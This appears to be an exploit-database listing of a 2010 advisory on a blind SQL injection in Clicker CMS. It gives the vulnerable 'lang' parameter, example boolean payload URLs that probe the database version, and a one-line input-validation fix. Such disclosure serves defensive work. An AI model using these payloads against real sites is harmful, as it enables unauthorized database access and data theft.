header-logo
Suggest Exploit
vendor:
Clicker CMS
by:
hacker@sr.gov.yu
7,5
CVSS
HIGH
Blind Sql Injection
89
CWE
Product Name: Clicker CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows & Linux
2010

Clicker CMS Blind SQL Injection Vulnerability

It was found that Clicker CMS does not validate properly the 'lang' parameter value. An attacker can inject malicious SQL code into the 'lang' parameter value and execute it in the backend database.

Mitigation:

Input validation of 'lang' parameter should be corrected.
Source

Exploit-DB raw data:

# Exploit Title: Clicker CMS Blind SQL Injection Vulnerability
# Date: 2010-06-25
# Author: hacker@sr.gov.yu
# Software Link: n/a
# Version: n/a


####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org, www.balcan-security.com
.:. Script : Clicker CMS
.:. Bug Type : Blind Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
####################################################################

===[ Exploit ]===

.:. It was found that Clicker CMS does not validate properly the "lang"
parameter value.

http://server/index.php?lang=4[BSQLi]

===[ Example ]===

http://server/index.php?lang=4 and substring(@@version,1,1)=5-- (true or false)
http://server/index.php?lang=4 and substring(@@version,1,1)=4-- (false or true)


===[ Solution ]===

.:. Input validation of "lang" parameter should be corrected.


Greetz to ALL EVILZONE.org && BALCAN-SECURITY.com members!!!
Pozdrav za sve iz Srbije!!! :-)))